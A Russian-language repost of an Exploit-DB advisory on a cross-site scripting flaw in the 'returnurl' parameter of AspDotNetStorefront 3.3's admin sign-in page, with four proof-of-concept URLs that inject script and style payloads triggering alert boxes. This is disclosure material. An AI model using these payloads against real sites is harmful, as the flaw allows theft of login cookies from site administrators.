- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24185
- Проверка EDB
-
- Пройдено
- Автор
- THOMAS RYAN
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2004-2701
- Дата публикации
- 2004-06-09
Код:
source: https://www.securityfocus.com/bid/10507/info
AspDotNetStorefront is prone to a cross-site scripting vulnerability. This issue exists due to insufficient sanitization of user-supplied data. The problem presents itself in the 'returnurl' parameter of the 'signin.aspx' script of the application and can allow remote attackers to steal cookie-based authentication credentials and carry out other attacks.
AspDotNetStorefront 3.3 is reportedly affected by this issue, however, it is possible that other versions are affected as well.
http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=1"style=
"background:url(javascript:alert('Vulnerable_To_XSS'))"%20"
http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=--><scri
pt>alert('Vulnerable_To_XSS')</script>
http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=>"><scri
pt>alert("Vulnerable_To_XSS")</script>
http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=>"'><img
%20src="javascript:alert('Vulnerable_To_XSS')">- Источник
- www.exploit-db.com
